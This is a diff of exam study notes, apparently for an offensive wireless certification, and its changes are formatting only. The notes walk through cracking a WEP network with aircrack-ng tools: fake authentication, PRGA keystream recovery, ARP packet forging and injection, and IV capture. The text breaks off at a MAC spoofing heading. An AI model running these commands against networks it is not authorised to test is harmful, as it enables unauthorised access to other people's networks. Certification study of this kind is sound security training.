Optixal/OSWA-Notes/README.md

 * Get ESSID, BSSID, Client's MAC, Channel.
 `airodump-ng [interface]`

 * Attempt to associate with AP.
-Successful when "Association successful :)" appears and stays, with no deauthentication messages.
+Successful when "Association successful :)" **appears** and **stays**, with no deauthentication messages.
 `aireplay-ng --fakeauth 15 -a [MAC of AP] -h [Our/Client's MAC] -e [Name of AP] [interface]`
 `aireplay-ng --fakeauth 5000 -o 1 -q 15 -a [MAC of AP] -h [Our/Client's MAC] -e [Name of AP] [interface]`
 `aireplay-ng --fakeauth 20 -o 1 -q 15 -a [MAC of AP] -h [Our/Client's MAC] -e [Name of AP] [interface]`

 * Captures data frames and attempts to obtain PRGA from AP by reinjecting and generating more traffic.
 Stores PRGA in a ".xor" file in current dir.
 Reply 'y' when prompted to reinject.
 May require few attempts with different packets, better with FromDS: 1.
-Do with fakeauth.
+Do with **fakeauth**.
 `aireplay-ng --fragment -b [MAC of AP] -h [Our/Client's MAC] [interface]`
 `aireplay-ng --chopchop -b [MAC of AP] -h [Our/Client's MAC] [interface]`

 * Forge an ARP request packet using PRGA xor file `packetforge-ng --arp -a [MAC of AP] -h [Our/Client's MAC] -l 255.255.255.255 -k 255.255.255.255 -y [.xor PRGA File] -w [filename]`

 * Inject forged ARP packet, causing AP to generate traffic.
-Do whith fakeauth.
+Do with **fakeauth**.
 `aireplay-ng --interactive -r [filename from prev step] [interface]`

 * Write out pcap file with captured data packets and IVs.
-Do with fakeauth and inject.
+Do with **fakeauth** and inject.
 Successful when "Data" column in airodump rapidly goes up.
 `airodump-ng --bssid=[MAC of AP] -c [channel] -w [filename] [interface]`

 ###### *Changing MAC Address (Required when AP uses MAC filtering)